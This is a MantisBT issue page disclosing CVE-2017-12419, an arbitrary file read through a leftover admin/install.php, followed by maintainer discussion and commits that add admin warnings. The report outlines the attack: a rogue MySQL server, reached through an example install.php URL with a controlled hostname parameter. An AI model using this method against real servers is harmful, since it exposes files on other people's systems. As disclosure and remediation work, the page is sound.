View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0023173 | mantisbt | installation | public | 2017-08-01 00:46 | 2017-08-04 19:35 |
Reporter | iamsecurity | Assigned To | |||
Priority | normal | Severity | crash | Reproducibility | always |
Status | confirmed | Resolution | open | ||
Summary | 0023173: CVE-2017-12419: Arbitrary File Read inside install.php script | ||||
Description | After successful installation of bug tracker, it doesn't remove install.php script because of that attacker can read any file on the remote system through some installation process steps. | ||||
Steps To Reproduce | For successful exploitation, you need run special rogue MySQL server and connect to it from a server where you want to read files. Unfortunately, Mantis allow that. An attacker can go to any step of an installation process. /admin/install.php:
If you browse to the URL https://mantisbt/admin/install.php?install=3 then you go to the install the database section. Where you can find that part of code. /admin/install.php:
Script try to connect to MySQL server, but you can control $f_hostname variable through HTTP-request parameter hostname. admin\install.php:
https://mantis/admin/install.php?install=3&hostname=127.0.0.1
| ||||
Additional Information | This issue potentially affects ALL MantisBT versions running on MySQL / MariaDB, unless they have disabled local_infile | ||||
Tags | No tags attached. | ||||
Attached Files | |||||
Thanks for your report. As per documentation, after installation the administrator is expected to delete the admin/ directory:
It would also be the admin's responsibility to prevent local file lookup in their MySQL setup (see MySQL documentation) I'm not sure if or how we can actually prevent such attack from MantisBT code though. If you have any ideas please let me know. |
|
I can confirm the exploit, which just tested on my dev box. Problem is, short of rewriting the whole installer to not rely on GPC parameters to control its state (which is not something I have the bandwidth for right now), I don't know how we could fix it. As a stopgap measure, I'll improve the documentation, system checks and warnings to better advise administrators of the vulnerability and potential risk. |
|
@iamsecurity, after a bit of research, I found that by setting |
|
MITRE assigned CVE-2017-12419 to this issue [scr370826] |
|
@dregad I'll check your fix and it's working for Documentation has good security recommendations about delete admin folder but in my practice, I find many Mantis installations with admin folder exists. |
|
Thanks for your feedback.
That's true unfortunately; but we can only do so much and system administrators also need to take their responsibilities at some point. It's worth mentioning that a warning about existence of admin directory used to be shown on login page in older versions of Mantis, but it was removed probably by mistake in 1.3.0 (see 0023179); this will be fixed in the next release, and should encourage administrators to do something about it.
That's an interesting approach. Problem is that we may not have write access to the file system, in which case the file would have to be created by the admin so back to square one. |
|
I just pushed several commits to improve the documentation and notifications to administrators about the presence of the admin directory, which hopefully increase awareness about the issue and thus lower the risk of people being vulnerable without knowing it. I will leave this issue open, since it is not fixed from a Mantis perspective (we rely on user action to protect themselves). |
|
MantisBT: master-2.5 d6d7dc2d 2017-08-03 12:54 Details Diff |
Restore "admin dir" warning on login page Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin checks on login page to remove the logic checking for pre 1.0 upgrade steps. However, it also (probably unintentionally) removed the check for admin directory presence, so administrators are no longer reminded that they should delete this directory, potentially leaving them exposed to security breaches. This commit restores the warning, and improves the error message. Fixes 0023179 Stopgap measure for issue 0023173 |
Affected Issues 0023173, 0023179, 0023185 |
|
mod - lang/strings_english.txt | Diff File | ||
mod - login_page.php | Diff File | ||
MantisBT: master-1.3.x 21a15b88 2017-08-03 12:54 Details Diff |
Restore "admin dir" warning on login page Commit 9da643a6f6c1b7604598968baa3cd2f6fd4540ff modified the admin checks on login page to remove the logic checking for pre 1.0 upgrade steps. However, it also (probably unintentionally) removed the check for admin directory presence, so administrators are no longer reminded that they should delete this directory, potentially leaving them exposed to security breaches. This commit restores the warning, and improves the error message. Fixes 0023179 Stopgap measure for issue 0023173 Backported from master-2.5 branch d6d7dc2dc7473637c8ac17a78c0374f16981f409 |
Affected Issues 0023173, 0023179, 0023186 |
|
mod - lang/strings_english.txt | Diff File | ||
mod - login_page.php | Diff File | ||
MantisBT: master-2.5 3a7c6f75 2017-08-03 15:39 Details Diff |
Improve admin information about CVE-2017-12419 - Add admin check for mysqli.allow_local_infile - Add reminder to remove admin dir at end of Admin checks - Improve post-install tasks section of Admin Guide: add explicit warning about potential consequences of not deleting the admin directory, more descriptive wording. Stopgap measures for issue 0023173 |
Affected Issues 0023173, 0023185 |
|
mod - admin/check/check_database_inc.php | Diff File | ||
mod - admin/check/index.php | Diff File | ||
mod - docbook/Admin_Guide/en-US/Installation.xml | Diff File | ||
MantisBT: master-1.3.x 10211c90 2017-08-04 13:45 Details Diff |
Improve admin information about CVE-2017-12419 - Add admin check for mysqli.allow_local_infile - Add reminder to remove admin dir at end of Admin checks - Improve post-install tasks section of Admin Guide: add explicit warning about potential consequences of not deleting the admin directory, more descriptive wording. Stopgap measures for issue 0023173 Backported from master-2.5 branch 3a7c6f75bf3c4bc0856ebffe388df9e46ac10e5d Conflicts: admin/check/index.php |
Affected Issues 0023173, 0023186 |
|
mod - admin/check/check_database_inc.php | Diff File | ||
mod - admin/check/index.php | Diff File | ||
mod - docbook/Admin_Guide/en-US/Installation.xml | Diff File |